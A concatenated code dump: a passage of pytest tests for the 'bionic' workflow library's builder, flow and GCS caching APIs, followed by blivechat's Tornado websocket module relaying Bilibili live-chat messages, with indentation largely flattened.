assert builder.build().get('x', set) == {7, 8}
builder.add_case('y', 7)
assert builder.build().get('y', set) == {1, 7}
builder.add_case('z', 7)
assert builder.build().get('z', set) == {2, 3, 7}
with raises(ValueError):
builder.add_case('f', 7)
with raises(UndefinedEntityError):
builder.add_case('xxx', 7)
builder.add_case('p', 4, 'q', 6)
builder.add_case('p', 5, 'q', 6)
assert builder.build().get('p', set) == {4, 5}
assert builder.build().get('q', set) == {5, 6}
with raises(ValueError):
builder.add_case('p', 7)
with raises(ValueError):
builder.add_case('p', 4, 'q', 6)
builder.declare('r')
with raises(ValueError):
builder.add_case('p', 1, 'q', 2, 'r', 3)
with raises(IncompatibleEntityError):
builder.add_case('y_plus', 2)
with raises(IncompatibleEntityError):
builder.add_case('y_plus', 2, 'y_plus_plus', 3)
def test_then_set(preset_builder):
builder = preset_builder
builder.declare('a')
builder.declare('b')
builder.declare('c')
builder.add_case('a', 1, 'b', 2).then_set('c', 3)
builder.add_case('a', 4, 'b', 5).then_set('c', 6)
assert builder.build().get('a', set) == {1, 4}
assert builder.build().get('b', set) == {2, 5}
assert builder.build().get('c', set) == {3, 6}
builder.declare('d')
case = builder.add_case('d', 1)
with raises(ValueError):
case.then_set('c', 1)
with raises(ValueError):
case.then_set('a', 1)
with raises(UndefinedEntityError):
case.then_set('xxx', 1)
def test_clear_cases(preset_builder):
builder = preset_builder
builder.clear_cases('x')
builder.set('x', 7)
assert builder.build().get('x') == 7
builder.clear_cases('x')
builder.set('x', values=[1, 2])
assert builder.build().get('x', set) == {1, 2}
builder.clear_cases('y')
builder.set('y', 8)
assert builder.build().get('y') == 8
builder.clear_cases('y')
builder.set('z', 9)
assert builder.build().get('z') == 9
builder.clear_cases('f')
builder.set('f', 10)
assert builder.build().get('f') == 10
with raises(IncompatibleEntityError):
builder.clear_cases('p')
builder.clear_cases('p', 'q')
with raises(IncompatibleEntityError):
builder.clear_cases('y_plus')
builder.clear_cases('y_plus', 'y_plus_plus')
def test_delete(preset_builder):
builder = preset_builder
builder.delete('g')
with raises(UndefinedEntityError):
builder.build().get('g')
builder.assign('g', 1)
    assert builder.build().get('g', set) == {1}
builder.delete('z')
with raises(UndefinedEntityError):
builder.build().get('z', set)
builder.delete('y')
with raises(UndefinedEntityError):
# This fails because f has been invalidated.
builder.build()
def test_call(builder):
builder.assign('a', 1)
builder.assign('b', 2)
@builder
def h(a, b):
return a + b
assert builder.build().get('h') == 3
builder.delete('a')
with raises(UndefinedEntityError):
builder.build().get('h')
def test_merge(builder):
# This is just a basic test; there's a more thorough test suite in
# test_merge.py.
builder.assign('a', 1)
builder.declare('b')
@builder
def h(a, b):
return a + b
builder2 = bn.FlowBuilder('flow2')
builder2.assign('b', 2)
builder.merge(builder2.build())
assert builder.build().get('h') == 3
builder3 = bn.FlowBuilder('flow3')
builder3.declare('a')
builder3.declare('b')
@builder3 # noqa: F811
def h(a, b):
return a * b
builder.merge(builder3.build(), keep='new')
# Notice: we correctly find the new value for `h`, rather than the cached
# version.
assert builder.build().get('h') == 2
# --- Flow API tests.
def test_get_single(preset_flow):
flow = preset_flow
with raises(ValueError):
flow.get('x')
assert flow.get('y') == 1
with raises(ValueError):
assert flow.get('z')
with raises(ValueError):
assert flow.get('f')
assert flow.get('p') == 4
assert flow.get('q') == 5
assert flow.get('y_plus') == 2
assert flow.get('y_plus_plus') == 3
with raises(UndefinedEntityError):
assert flow.get('xxx')
def test_get_multiple(preset_flow):
flow = preset_flow
assert flow.get('x', set) == set()
assert flow.get('y', set) == {1}
assert flow.get('z', set) == {2, 3}
assert flow.get('f', set) == set()
assert flow.get('g', set) == {3, 4}
assert flow.get('p', set) == {4}
assert flow.get('q', set) == {5}
def test_get_formats(preset_flow):
flow = preset_flow
for fmt in [list, 'list']:
ys = flow.get('y', fmt)
assert ys == [1]
zs = flow.get('z', fmt)
assert zs == [2, 3] or zs == [3, 2]
ps = flow.get('p', fmt)
assert ps == [4]
for fmt in [set, 'set']:
assert flow.get('y', fmt) == {1}
assert flow.get('z', fmt) == {2, 3}
assert flow.get('p', fmt) == {4}
for fmt in [pd.Series, 'series']:
y_series = flow.get('y', fmt)
assert list(y_series) == [1]
assert y_series.name == 'y'
z_series = flow.get('z', fmt).sort_values()
assert list(z_series) == [2, 3]
assert z_series.name == 'z'
# This is a convoluted way of accessing the index, but I don't want
# the test to be sensitive to whether we output a regular index or a
# MultiIndex.
z_series_index_df = z_series.index.to_frame()\
.applymap(lambda x: x.get())
assert list(z_series_index_df.columns) == ['z']
assert list(z_series_index_df['z']) == [2, 3]
p_series = flow.get('p', fmt)
assert list(p_series) == [4]
assert p_series.name == 'p'
p_series_index_df = p_series.index.to_frame()\
.applymap(lambda x: x.get())
assert list(sorted(p_series_index_df.columns)) == ['p', 'q']
assert list(p_series_index_df['p']) == [4]
assert list(p_series_index_df['q']) == [5]
def test_assigning(preset_flow):
flow = preset_flow
assert flow.assigning('a', 2).get('a') == 2
assert flow.assigning('a', values=[3, 4]).get('a', set) == {3, 4}
with raises(AlreadyDefinedEntityError):
flow.assigning('x', 1)
def test_setting(preset_flow):
flow = preset_flow
assert flow.get('y') == 1
assert flow.setting('y', 2).get('y') == 2
assert flow.setting('y', values=[3, 4]).get('y', set) == {3, 4}
with raises(UndefinedEntityError):
flow.setting('xxx', 1)
assert flow.get('y') == 1
def test_declaring(preset_flow):
flow = preset_flow
assert flow.declaring('a').setting('a', 1).get('a') == 1
with raises(AlreadyDefinedEntityError):
flow.assigning('x', 1)
def test_merging(preset_flow):
flow = preset_flow
new_flow = (
bn.FlowBuilder('new_flow').build()
.assigning('x', 5)
.assigning('y', 6)
)
assert flow.get('f', set) == set()
with pytest.raises(AlreadyDefinedEntityError):
assert flow.merging(new_flow)
assert flow.merging(new_flow, keep='old').get('f') == 6
assert flow.merging(new_flow, keep='new').get('f') == 11
def test_adding_case(preset_flow):
flow = preset_flow
assert flow.get('x', set) == set()
assert flow.adding_case('x', 1).get('x', set) == {1}
assert flow.get('p', set) == {4}
assert flow.adding_case('p', 4, 'q', 6).get('q', set) == {5, 6}
assert flow\
.adding_case('p', 4, 'q', 6)\
.adding_case('p', 4, 'q', 7)\
.get('q', set) == {5, 6, 7}
with raises(ValueError):
flow.adding_case('p', 3)
assert flow.get('x', set) == set()
assert flow.get('p', set) == {4}
assert flow.get('q', set) == {5}
def test_then_setting(builder):
builder.declare('a')
builder.declare('b')
builder.declare('c')
flow0 = builder.build()
flow1 = flow0\
.adding_case('a', 1, 'b', 2)\
        .then_setting('c', 3)
flow2 = flow1\
.adding_case('a', 4, 'b', 5)\
        .then_setting('c', 6)
assert flow0.get('a', set) == set()
assert flow0.get('b', set) == set()
assert flow0.get('c', set) == set()
assert flow1.get('a', set) == {1}
assert flow1.get('b', set) == {2}
assert flow1.get('c', set) == {3}
assert flow2.get('a', set) == {1, 4}
assert flow2.get('b', set) == {2, 5}
assert flow2.get('c', set) == {3, 6}
assert flow0.get('a', set) == set()
assert flow0.get('b', set) == set()
assert flow0.get('c', set) == set()
def test_then_setting_too_soon(builder):
builder.declare('c')
flow = builder.build()
with raises(ValueError):
flow.then_setting('c', 1)
def test_clearing_cases(preset_flow):
flow = preset_flow
assert flow.get('z', set) == {2, 3}
assert flow.clearing_cases('z').get('z', set) == set()
assert flow.clearing_cases('z').setting('z', 1).get('z') == 1
def test_all_entity_names(preset_flow):
assert set(preset_flow.all_entity_names()) == {
'x', 'y', 'z', 'f', 'g', 'p', 'q', 'y_plus', 'y_plus_plus'
}
def test_in_memory_caching(builder):
builder.assign('x', 2)
builder.assign('y', 3)
@builder
@bn.persist(False)
@count_calls
def xy(x, y):
return x * y
flow = builder.build()
assert flow.get('xy') == 6
assert xy.times_called() == 1
assert flow.get('xy') == 6
assert xy.times_called() == 0
flow = builder.build()
assert flow.get('xy') == 6
assert xy.times_called() == 1
new_flow = flow.setting('y', values=[4, 5])
assert new_flow.get('xy', set) == {8, 10}
assert xy.times_called() == 2
assert new_flow.get('xy', set) == {8, 10}
assert xy.times_called() == 0
assert flow.get('xy') == 6
assert xy.times_called() == 0
def test_to_builder(builder):
builder.assign('x', 1)
flow = builder.build()
assert flow.get('x') == 1
new_builder = flow.to_builder()
new_builder.set('x', 2)
new_flow = new_builder.build()
assert new_flow.get('x') == 2
assert flow.get('x') == 1
assert builder.build().get('x') == 1
def test_shortcuts(builder):
builder.assign('x', 1)
flow = builder.build()
assert flow.get.x() == 1
assert flow.setting.x(3).get.x() == 3
def test_unhashable_index_values(builder):
builder.assign('xs', values=[[1, 2], [2, 3]])
@builder
def xs_sum(xs):
return sum(xs)
sums_series = builder.build().get('xs_sum', 'series').sort_values()
assert list(sums_series) == [3, 5]
index_items = [wrapper.get() for wrapper, in sums_series.index]
assert index_items == [[1, 2], [2, 3]]
```
#### File: tests/test_flow/test_persistence_gcs.py
```python
import pytest
import random
import subprocess
import getpass
import shutil
import six
import dask.dataframe as dd
from ..helpers import (
ResettingCounter, skip_unless_gcs, GCS_TEST_BUCKET, df_from_csv_str,
equal_frame_and_index_content)
from bionic.exception import CodeVersioningError
import bionic as bn
# This is detected by pytest and applied to all the tests in this module.
pytestmark = skip_unless_gcs
def gsutil_wipe_path(url):
assert 'BNTESTDATA' in url
subprocess.check_call(['gsutil', '-q', '-m', 'rm', '-rf', url])
def gsutil_path_exists(url):
return subprocess.call(['gsutil', 'ls', url]) == 0
def local_wipe_path(path_str):
assert 'BNTESTDATA' in path_str
shutil.rmtree(path_str)
@pytest.fixture(scope='module')
def bucket_name():
return GCS_TEST_BUCKET
@pytest.fixture(scope='function')
def tmp_object_path(bucket_name):
random_hex_str = '%016x' % random.randint(0, 2 ** 64)
path_str = '%s/BNTESTDATA/%s' % (getpass.getuser(), random_hex_str)
gs_url = 'gs://%s/%s' % (bucket_name, path_str)
# This emits a stderr warning because the URL doesn't exist. That's
# annoying but I wasn't able to find a straightforward way to avoid it.
assert not gsutil_path_exists(gs_url)
yield path_str
gsutil_wipe_path(gs_url)
@pytest.fixture(scope='function')
def gcs_builder(builder, bucket_name, tmp_object_path):
builder = builder.build().to_builder()
builder.set('core__persistent_cache__gcs__bucket_name', bucket_name)
builder.set('core__persistent_cache__gcs__object_path', tmp_object_path)
builder.set('core__persistent_cache__gcs__enabled', True)
builder.set('core__versioning_mode', 'assist')
return builder
# This should really be multiple separate tests, but it's expensive to do the
# setup, teardown, and client initialization, so we'll just do it all in one
# place.
def test_gcs_caching(gcs_builder):
# Setup.
call_counter = ResettingCounter()
builder = gcs_builder
builder.assign('x', 2)
builder.assign('y', 3)
@builder
def xy(x, y):
call_counter.mark()
return x * y
# Test reading from and writing to GCS cache.
flow = builder.build()
local_cache_path_str = flow.get('core__persistent_cache__flow_dir')
gcs_cache_url = flow.get('core__persistent_cache__gcs__url')
assert flow.get('xy') == 6
assert flow.setting('x', 4).get('xy') == 12
assert call_counter.times_called() == 2
flow = builder.build()
assert flow.get('xy') == 6
assert flow.setting('x', 4).get('xy') == 12
assert call_counter.times_called() == 0
gsutil_wipe_path(gcs_cache_url)
flow = builder.build()
assert flow.get('xy') == 6
assert flow.setting('x', 4).get('xy') == 12
assert call_counter.times_called() == 0
local_wipe_path(local_cache_path_str)
flow = builder.build()
assert flow.get('xy') == 6
assert flow.setting('x', 4).get('xy') == 12
assert call_counter.times_called() == 0
gsutil_wipe_path(gcs_cache_url)
local_wipe_path(local_cache_path_str)
flow = builder.build()
assert flow.get('xy') == 6
assert flow.setting('x', 4).get('xy') == 12
assert call_counter.times_called() == 2
# Test versioning.
@builder # noqa: F811
def xy(x, y):
call_counter.mark()
return y * x
flow = builder.build()
with pytest.raises(CodeVersioningError):
flow.get('xy')
local_wipe_path(local_cache_path_str)
flow = builder.build()
with pytest.raises(CodeVersioningError):
flow.get('xy')
@builder # noqa: F811
@bn.version(minor=1)
def xy(x, y):
call_counter.mark()
return y * x
flow = builder.build()
assert flow.get('xy') == 6
assert flow.setting('x', 4).get('xy') == 12
assert call_counter.times_called() == 0
local_wipe_path(local_cache_path_str)
flow = builder.build()
assert flow.get('xy') == 6
assert flow.setting('x', 4).get('xy') == 12
assert call_counter.times_called() == 0
@builder # noqa: F811
@bn.version(major=1)
def xy(x, y):
call_counter.mark()
return x ** y
flow = builder.build()
assert flow.get('xy') == 8
assert flow.setting('x', 4).get('xy') == 64
assert call_counter.times_called() == 2
local_wipe_path(local_cache_path_str)
flow = builder.build()
assert flow.get('xy') == 8
assert flow.setting('x', 4).get('xy') == 64
assert call_counter.times_called() == 0
# Test indirect versioning.
@builder
def xy_plus(xy):
return xy + 1
flow = builder.build()
assert flow.get('xy_plus') == 9
assert call_counter.times_called() == 0
@builder # noqa: F811
@bn.version(major=1)
def xy(x, y):
call_counter.mark()
return int(float(x)) ** y
flow = builder.build()
with pytest.raises(CodeVersioningError):
flow.get('xy_plus')
@builder # noqa: F811
@bn.version(major=1, minor=1)
def xy(x, y):
call_counter.mark()
return int(float(y)) ** x
flow = builder.build()
assert flow.get('xy_plus') == 9
assert call_counter.times_called() == 0
@builder # noqa: F811
@bn.version(major=2)
def xy(x, y):
call_counter.mark()
return y ** x
flow = builder.build()
assert flow.get('xy_plus') == 10
assert call_counter.times_called() == 1
# Dask only works in Python 3.
if six.PY3:
# Test multi-file serialization.
dask_df = dd.from_pandas(
df_from_csv_str(
'''
color,number
red,1
blue,2
green,3
'''),
npartitions=1)
@builder
@bn.protocol.dask
def df():
call_counter.mark()
return dask_df
flow = builder.build()
assert equal_frame_and_index_content(
flow.get('df').compute(), dask_df.compute())
assert equal_frame_and_index_content(
flow.get('df').compute(), dask_df.compute())
assert call_counter.times_called() == 1
local_wipe_path(local_cache_path_str)
flow = builder.build()
assert equal_frame_and_index_content(
flow.get('df').compute(), dask_df.compute())
assert call_counter.times_called() == 0
```
#### File: bionic/tests/test_util.py
```python
import pytest
from .helpers import equal_when_sorted
import bionic.util as util
def test_group_pairs():
from bionic.util import group_pairs
assert group_pairs([]) == []
assert group_pairs([1, 2]) == [(1, 2)]
assert group_pairs([1, 2, 3, 4, 5, 6]) == [(1, 2), (3, 4), (5, 6)]
with pytest.raises(ValueError):
group_pairs([1])
with pytest.raises(ValueError):
group_pairs([1, 2, 3])
def test_immutable_sequence():
class Seq(util.ImmutableSequence):
def __init__(self, items):
super(Seq, self).__init__(items)
seq = Seq([1, 2, 3])
assert seq[0] == 1
assert seq[2] == 3
assert seq[-2] == 2
assert list(seq) == [1, 2, 3]
assert len(seq) == 3
assert 1 in seq
assert 4 not in seq
assert {seq: 7}[seq] == 7
assert seq == Seq([1, 2, 3])
assert seq != Seq([1, 3, 2])
assert seq != [1, 2, 3]
assert seq < Seq([1, 3, 2])
assert seq <= Seq([1, 3, 2])
assert Seq([1, 3, 2]) > seq
assert Seq([1, 3, 2]) >= seq
def test_immutable_mapping():
class Mapping(util.ImmutableMapping):
def __init__(self, values_by_key):
super(Mapping, self).__init__(values_by_key)
mapping = Mapping({'a': 1, 'b': 2})
assert mapping['a'] == 1
assert mapping['b'] == 2
with pytest.raises(KeyError):
mapping['c']
assert mapping.get('a') == 1
assert mapping.get('c') is None
assert {mapping: 7}[mapping] == 7
assert equal_when_sorted(list(mapping), ['a', 'b'])
assert dict(mapping) == {'a': 1, 'b': 2}
assert equal_when_sorted(list(mapping.keys()), ['a', 'b'])
assert equal_when_sorted(list(mapping.values()), [1, 2])
assert equal_when_sorted(list(mapping.items()), [('a', 1), ('b', 2)])
assert equal_when_sorted(list(mapping.keys()), ['a', 'b'])
assert equal_when_sorted(list(mapping.values()), [1, 2])
assert equal_when_sorted(list(mapping.items()), [('a', 1), ('b', 2)])
assert mapping == Mapping({'a': 1, 'b': 2})
assert mapping != {'a': 1, 'b': 2}
assert mapping != Mapping({'b': 1, 'a': 2})
assert mapping < Mapping({'b': 1, 'a': 2})
assert mapping <= Mapping({'b': 1, 'a': 2})
assert Mapping({'b': 1, 'a': 2}) > mapping
assert Mapping({'b': 1, 'a': 2}) >= mapping
```
|
{
"source": "Jecosine/blivechat",
"score": 2
}
|
#### File: blivechat/api/chat.py
```python
import asyncio
import enum
import json
import logging
import random
import time
import uuid
from typing import *
import aiohttp
import tornado.websocket
import api.base
import blivedm.blivedm as blivedm
import config
import models.avatar
import models.translate
import models.log
logger = logging.getLogger(__name__)
class Command(enum.IntEnum):
HEARTBEAT = 0
JOIN_ROOM = 1
ADD_TEXT = 2
ADD_GIFT = 3
ADD_MEMBER = 4
ADD_SUPER_CHAT = 5
DEL_SUPER_CHAT = 6
UPDATE_TRANSLATION = 7
_http_session = aiohttp.ClientSession(timeout=aiohttp.ClientTimeout(total=10))
room_manager: Optional['RoomManager'] = None
def init():
global room_manager
room_manager = RoomManager()
class Room(blivedm.BLiveClient):
HEARTBEAT_INTERVAL = 10
    # The parse_XXX methods are redefined here to reduce dependence on field
    # names, in case Bilibili renames them
def __parse_danmaku(self, command):
info = command['info']
if info[3]:
room_id = info[3][3]
medal_level = info[3][0]
else:
room_id = medal_level = 0
return self._on_receive_danmaku(blivedm.DanmakuMessage(
None, None, None, info[0][4], None, None, info[0][9], None,
info[1],
info[2][0], info[2][1], info[2][2], None, None, info[2][5], info[2][6], None,
medal_level, None, None, room_id, None, None,
info[4][0], None, None,
None, None,
info[7]
))
def __parse_gift(self, command):
data = command['data']
return self._on_receive_gift(blivedm.GiftMessage(
data['giftName'], data['num'], data['uname'], data['face'], None,
data['uid'], data['timestamp'], None, None,
None, None, None, data['coin_type'], data['total_coin']
))
def __parse_buy_guard(self, command):
data = command['data']
return self._on_buy_guard(blivedm.GuardBuyMessage(
data['uid'], data['username'], data['guard_level'], None, None,
None, None, data['start_time'], None
))
def __parse_super_chat(self, command):
data = command['data']
return self._on_super_chat(blivedm.SuperChatMessage(
data['price'], data['message'], None, data['start_time'],
None, None, data['id'], None,
None, data['uid'], data['user_info']['uname'],
data['user_info']['face'], None,
None, None,
None, None, None,
None
))
_COMMAND_HANDLERS = {
**blivedm.BLiveClient._COMMAND_HANDLERS,
'DANMU_MSG': __parse_danmaku,
'SEND_GIFT': __parse_gift,
'GUARD_BUY': __parse_buy_guard,
'SUPER_CHAT_MESSAGE': __parse_super_chat
}
def __init__(self, room_id):
super().__init__(room_id, session=_http_session, heartbeat_interval=self.HEARTBEAT_INTERVAL)
self.clients: List['ChatHandler'] = []
self.auto_translate_count = 0
async def init_room(self):
await super().init_room()
return True
def stop_and_close(self):
if self.is_running:
future = self.stop()
future.add_done_callback(lambda _future: asyncio.ensure_future(self.close()))
else:
asyncio.ensure_future(self.close())
def send_message(self, cmd, data):
body = json.dumps({'cmd': cmd, 'data': data})
models.log.add_danmaku(self.room_id, body)
for client in self.clients:
try:
client.write_message(body)
except tornado.websocket.WebSocketClosedError:
room_manager.del_client(self.room_id, client)
def send_message_if(self, can_send_func: Callable[['ChatHandler'], bool], cmd, data):
body = json.dumps({'cmd': cmd, 'data': data})
for client in filter(can_send_func, self.clients):
try:
client.write_message(body)
except tornado.websocket.WebSocketClosedError:
room_manager.del_client(self.room_id, client)
async def _on_receive_danmaku(self, danmaku: blivedm.DanmakuMessage):
asyncio.ensure_future(self.__on_receive_danmaku(danmaku))
async def __on_receive_danmaku(self, danmaku: blivedm.DanmakuMessage):
        if danmaku.uid == self.room_owner_uid:
            author_type = 3  # room owner (streamer)
        elif danmaku.admin:
            author_type = 2  # room admin
        elif danmaku.privilege_type != 0:  # guard levels: 1 = governor, 2 = admiral, 3 = captain
            author_type = 1  # guard member
        else:
            author_type = 0
need_translate = self._need_translate(danmaku.msg)
if need_translate:
translation = models.translate.get_translation_from_cache(danmaku.msg)
if translation is None:
                # Not cached; translate asynchronously later and notify the client
translation = ''
else:
need_translate = False
else:
translation = ''
id_ = uuid.uuid4().hex
        # Use a list instead of a dict to save bandwidth
self.send_message(Command.ADD_TEXT, make_text_message(
await models.avatar.get_avatar_url(danmaku.uid),
int(danmaku.timestamp / 1000),
danmaku.uname,
author_type,
danmaku.msg,
danmaku.privilege_type,
danmaku.msg_type,
danmaku.user_level,
danmaku.urank < 10000,
danmaku.mobile_verify,
0 if danmaku.room_id != self.room_id else danmaku.medal_level,
id_,
translation
))
if need_translate:
await self._translate_and_response(danmaku.msg, id_)
async def _on_receive_gift(self, gift: blivedm.GiftMessage):
avatar_url = models.avatar.process_avatar_url(gift.face)
models.avatar.update_avatar_cache(gift.uid, avatar_url)
        if gift.coin_type != 'gold':  # embarrassing (free gift), skip it
return
id_ = uuid.uuid4().hex
self.send_message(Command.ADD_GIFT, {
'id': id_,
'avatarUrl': avatar_url,
'timestamp': gift.timestamp,
'authorName': gift.uname,
'totalCoin': gift.total_coin,
'giftName': gift.gift_name,
'num': gift.num
})
async def _on_buy_guard(self, message: blivedm.GuardBuyMessage):
asyncio.ensure_future(self.__on_buy_guard(message))
async def __on_buy_guard(self, message: blivedm.GuardBuyMessage):
id_ = uuid.uuid4().hex
self.send_message(Command.ADD_MEMBER, {
'id': id_,
'avatarUrl': await models.avatar.get_avatar_url(message.uid),
'timestamp': message.start_time,
'authorName': message.username,
'privilegeType': message.guard_level
})
async def _on_super_chat(self, message: blivedm.SuperChatMessage):
avatar_url = models.avatar.process_avatar_url(message.face)
models.avatar.update_avatar_cache(message.uid, avatar_url)
need_translate = self._need_translate(message.message)
if need_translate:
translation = models.translate.get_translation_from_cache(message.message)
if translation is None:
                # Not cached; translate asynchronously later and notify the client
translation = ''
else:
need_translate = False
else:
translation = ''
id_ = str(message.id)
self.send_message(Command.ADD_SUPER_CHAT, {
'id': id_,
'avatarUrl': avatar_url,
'timestamp': message.start_time,
'authorName': message.uname,
'price': message.price,
'content': message.message,
'translation': translation
})
if need_translate:
asyncio.ensure_future(self._translate_and_response(message.message, id_))
async def _on_super_chat_delete(self, message: blivedm.SuperChatDeleteMessage):
self.send_message(Command.ADD_SUPER_CHAT, {
'ids': list(map(str, message.ids))
})
def _need_translate(self, text):
cfg = config.get_config()
return (
cfg.enable_translate
and (not cfg.allow_translate_rooms or self.room_id in cfg.allow_translate_rooms)
and self.auto_translate_count > 0
and models.translate.need_translate(text)
)
async def _translate_and_response(self, text, msg_id):
translation = await models.translate.translate(text)
if translation is None:
return
self.send_message_if(
lambda client: client.auto_translate,
Command.UPDATE_TRANSLATION, make_translation_message(
msg_id,
translation
)
)
def make_text_message(avatar_url, timestamp, author_name, author_type, content, privilege_type,
is_gift_danmaku, author_level, is_newbie, is_mobile_verified, medal_level,
id_, translation):
return [
# 0: avatarUrl
avatar_url,
# 1: timestamp
timestamp,
# 2: authorName
author_name,
# 3: authorType
author_type,
# 4: content
content,
# 5: privilegeType
privilege_type,
# 6: isGiftDanmaku
1 if is_gift_danmaku else 0,
# 7: authorLevel
author_level,
# 8: isNewbie
1 if is_newbie else 0,
# 9: isMobileVerified
1 if is_mobile_verified else 0,
# 10: medalLevel
medal_level,
# 11: id
id_,
# 12: translation
translation
]
def make_translation_message(msg_id, translation):
return [
# 0: id
msg_id,
# 1: translation
translation
]
class RoomManager:
def __init__(self):
self._rooms: Dict[int, Room] = {}
async def get_room(self, room_id):
if room_id not in self._rooms:
if not await self._add_room(room_id):
return
room = self._rooms.get(room_id, None)
return room
async def add_client(self, room_id, client: 'ChatHandler'):
if room_id not in self._rooms:
if not await self._add_room(room_id):
client.close()
return
room = self._rooms.get(room_id, None)
if room is None:
return
room.clients.append(client)
logger.info('%d clients in room %s', len(room.clients), room_id)
if client.auto_translate:
room.auto_translate_count += 1
await client.on_join_room()
def del_client(self, room_id, client: 'ChatHandler'):
room = self._rooms.get(room_id, None)
if room is None:
return
try:
room.clients.remove(client)
except ValueError:
            # _add_room hasn't finished yet, so room.clients.append was never reached
pass
else:
logger.info('%d clients in room %s', len(room.clients), room_id)
if client.auto_translate:
room.auto_translate_count = max(0, room.auto_translate_count - 1)
if not room.clients:
self._del_room(room_id)
async def _add_room(self, room_id):
if room_id in self._rooms:
return True
logger.info('Creating room %d', room_id)
self._rooms[room_id] = room = Room(room_id)
if await room.init_room():
# start new log file
room.start()
logger.info('%d rooms', len(self._rooms))
return True
else:
self._del_room(room_id)
return False
def _del_room(self, room_id):
room = self._rooms.get(room_id, None)
if room is None:
return
logger.info('Removing room %d', room_id)
for client in room.clients:
client.close()
room.stop_and_close()
self._rooms.pop(room_id, None)
logger.info('%d rooms', len(self._rooms))
# noinspection PyAbstractClass
class ChatHandler(tornado.websocket.WebSocketHandler):
HEARTBEAT_INTERVAL = 10
RECEIVE_TIMEOUT = HEARTBEAT_INTERVAL + 5
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._heartbeat_timer_handle = None
self._receive_timeout_timer_handle = None
self.room_id = None
self.auto_translate = False
def open(self):
logger.info('Websocket connected %s', self.request.remote_ip)
self._heartbeat_timer_handle = asyncio.get_event_loop().call_later(
self.HEARTBEAT_INTERVAL, self._on_send_heartbeat
)
self._refresh_receive_timeout_timer()
def _on_send_heartbeat(self):
self.send_message(Command.HEARTBEAT, {})
self._heartbeat_timer_handle = asyncio.get_event_loop().call_later(
self.HEARTBEAT_INTERVAL, self._on_send_heartbeat
)
def _refresh_receive_timeout_timer(self):
if self._receive_timeout_timer_handle is not None:
self._receive_timeout_timer_handle.cancel()
self._receive_timeout_timer_handle = asyncio.get_event_loop().call_later(
self.RECEIVE_TIMEOUT, self._on_receive_timeout
)
def _on_receive_timeout(self):
logger.warning('Client %s timed out', self.request.remote_ip)
self._receive_timeout_timer_handle = None
self.close()
def on_close(self):
logger.info('Websocket disconnected %s room: %s', self.request.remote_ip, str(self.room_id))
if self.has_joined_room:
room_manager.del_client(self.room_id, self)
if self._heartbeat_timer_handle is not None:
self._heartbeat_timer_handle.cancel()
self._heartbeat_timer_handle = None
if self._receive_timeout_timer_handle is not None:
self._receive_timeout_timer_handle.cancel()
self._receive_timeout_timer_handle = None
def on_message(self, message):
try:
            # Also disconnect clients that never join a room before the timeout
if self.has_joined_room:
self._refresh_receive_timeout_timer()
body = json.loads(message)
cmd = body['cmd']
if cmd == Command.HEARTBEAT:
pass
elif cmd == Command.JOIN_ROOM:
if self.has_joined_room:
return
self._refresh_receive_timeout_timer()
self.room_id = int(body['data']['roomId'])
logger.info('Client %s is joining room %d', self.request.remote_ip, self.room_id)
try:
cfg = body['data']['config']
self.auto_translate = cfg['autoTranslate']
except KeyError:
pass
asyncio.ensure_future(room_manager.add_client(self.room_id, self))
else:
logger.warning('Unknown cmd, client: %s, cmd: %d, body: %s', self.request.remote_ip, cmd, body)
except Exception:
logger.exception('on_message error, client: %s, message: %s', self.request.remote_ip, message)
    # For cross-origin testing
def check_origin(self, origin):
if self.application.settings['debug']:
return True
return super().check_origin(origin)
@property
def has_joined_room(self):
return self.room_id is not None
def send_message(self, cmd, data):
body = json.dumps({'cmd': cmd, 'data': data})
try:
self.write_message(body)
except tornado.websocket.WebSocketClosedError:
self.close()
async def on_join_room(self):
if self.application.settings['debug']:
await self.send_test_message()
        # Tell the client when auto translation is not allowed in this room
if self.auto_translate:
cfg = config.get_config()
if cfg.allow_translate_rooms and self.room_id not in cfg.allow_translate_rooms:
self.send_message(Command.ADD_TEXT, make_text_message(
models.avatar.DEFAULT_AVATAR_URL,
int(time.time()),
'blivechat',
2,
'Translation is not allowed in this room. Please download to use translation',
0,
False,
60,
False,
True,
0,
uuid.uuid4().hex,
''
))
    # For testing
async def send_test_message(self):
base_data = {
'avatarUrl': await models.avatar.get_avatar_url(300474),
'timestamp': int(time.time()),
'authorName': 'xfgryujk',
}
text_data = make_text_message(
base_data['avatarUrl'],
base_data['timestamp'],
base_data['authorName'],
0,
'我能吞下玻璃而不伤身体',
0,
False,
20,
False,
True,
0,
uuid.uuid4().hex,
''
)
member_data = {
**base_data,
'id': uuid.uuid4().hex,
'privilegeType': 3
}
gift_data = {
**base_data,
'id': uuid.uuid4().hex,
'totalCoin': 450000,
'giftName': '摩天大楼',
'num': 1
}
sc_data = {
**base_data,
'id': str(random.randint(1, 65535)),
'price': 30,
'content': 'The quick brown fox jumps over the lazy dog',
'translation': ''
}
self.send_message(Command.ADD_TEXT, text_data)
text_data[2] = '主播'
text_data[3] = 3
text_data[4] = "I can eat glass, it doesn't hurt me."
text_data[11] = uuid.uuid4().hex
self.send_message(Command.ADD_TEXT, text_data)
self.send_message(Command.ADD_MEMBER, member_data)
self.send_message(Command.ADD_SUPER_CHAT, sc_data)
sc_data['id'] = str(random.randint(1, 65535))
sc_data['price'] = 100
sc_data['content'] = '敏捷的棕色狐狸跳过了懒狗'
self.send_message(Command.ADD_SUPER_CHAT, sc_data)
# self.send_message(Command.DEL_SUPER_CHAT, {'ids': [sc_data['id']]})
self.send_message(Command.ADD_GIFT, gift_data)
gift_data['id'] = uuid.uuid4().hex
gift_data['totalCoin'] = 1245000
gift_data['giftName'] = '小电视飞船'
self.send_message(Command.ADD_GIFT, gift_data)
# noinspection PyAbstractClass
class RoomInfoHandler(api.base.ApiHandler):
_host_server_list_cache = blivedm.DEFAULT_DANMAKU_SERVER_LIST
async def get(self):
room_id = int(self.get_query_argument('roomId'))
logger.info('Client %s is getting room info %d', self.request.remote_ip, room_id)
room_id, owner_uid = await self._get_room_info(room_id)
host_server_list = await self._get_server_host_list(room_id)
if owner_uid == 0:
            # Cache for 3 minutes
self.set_header('Cache-Control', 'private, max-age=180')
else:
            # Cache for 1 day
self.set_header('Cache-Control', 'private, max-age=86400')
self.write({
'roomId': room_id,
'ownerUid': owner_uid,
'hostServerList': host_server_list
})
@staticmethod
async def _get_room_info(room_id):
try:
async with _http_session.get(blivedm.ROOM_INIT_URL, params={'room_id': room_id}
) as res:
if res.status != 200:
logger.warning('room %d _get_room_info failed: %d %s', room_id,
res.status, res.reason)
return room_id, 0
data = await res.json()
